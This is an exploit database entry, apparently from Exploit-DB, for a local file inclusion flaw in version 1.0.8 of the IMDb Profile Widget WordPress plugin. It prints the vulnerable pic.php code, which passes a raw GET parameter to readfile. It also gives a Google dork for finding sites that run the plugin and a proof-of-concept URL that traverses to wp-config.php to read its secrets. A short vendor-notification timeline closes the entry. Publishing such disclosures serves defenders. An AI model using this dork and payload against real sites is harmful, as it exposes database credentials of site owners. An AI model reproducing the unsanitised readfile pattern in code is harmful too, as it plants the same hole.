WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion

Author: CrashBandicot
type: webapps
platform: php
port: 80.0
date_added: 2016-03-30  
date_updated: 2018-09-11  
verified: 1  
codes:   
tags: WordPress Plugin  
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt40000/39621.png  
application_url: http://www.exploit-db.comimdb-widget.1.0.8.zip  

raw file: 39621.txt  
# Exploit Title: Wordpress Plugin IMDb Profile Widget - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-26
# Google Dork : inurl:/wp-content/plugins/imdb-widget
# Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
# Tested on: MSWin32
# Version: 1.0.8

# Vuln file : pic.php

<?php

header( 'Content-Type: image/jpeg' );
readfile( $_GET["url"] );


# PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
# Right click -> Save As -> rename pic.jpg in .txt and read file

# 26/03/2016 - Informed Vendor about Issue
# 27/03/2016 - Waiting Reply